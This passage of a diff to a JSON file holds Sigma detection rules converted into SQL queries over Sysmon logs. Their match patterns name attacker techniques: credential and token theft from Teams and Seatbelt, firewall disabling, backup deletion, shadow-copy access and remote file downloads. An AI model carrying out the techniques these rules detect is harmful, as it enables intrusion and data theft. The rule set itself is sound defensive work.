Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pubprn.yml" + "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" }, { - "title": "Add New Windows Capability - ProcCreation", - "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. 
Filter accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_add_windows_capability.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "title": "Fake Instance Of Hxtsr.exe", + "id": "4e762605-34a8-406d-b72e-c1a089313320", "status": "test", - "description": "Detects command lines that indicate 
unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hxtsr_masquerading.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "title": "Remote File Download via Desktopimgdownldr Utility", + "id": "214641c2-c579-4ecb-8427-0cf19df6842e", "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", - 
"author": "Florian Roth (Nextron Systems)", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", - "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "title": "Suspicious Powercfg Execution To Change 
Lock Screen Timeout", + "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", + "author": "frack113", "tags": [ "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_powercfg_execution.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - 
"description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ "attack.impact", - "attack.t1485" + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "PUA - Advanced Port Scanner Execution", - "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", "status": "experimental", - "description": "Detects the use of Advanced Port Scanner.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" + "Unknown" ], - "level": 
"medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_advanced_port_scanner.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + 
"attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Windows Firewall Disabled via PowerShell", + "id": "12f6b752-042d-483e-bf9c-915a6d06ad75", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": 
"@SerkinValery", + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "author": "Tim Rauch", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND CommandLine LIKE '% -Enabled %' ESCAPE '\\' AND CommandLine LIKE '% False%' ESCAPE '\\') AND (CommandLine LIKE '% -All %' ESCAPE '\\' OR CommandLine LIKE '%Public%' ESCAPE '\\' OR CommandLine LIKE '%Domain%' ESCAPE '\\' OR CommandLine LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_powershell_disable_firewall.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton 
(update fp)", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND 
CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Persistence Via TypedPaths - CommandLine", - "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "title": "Suspicious Execution of InstallUtil To Download", + "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_typed_paths_persistence.yml" + "filename": 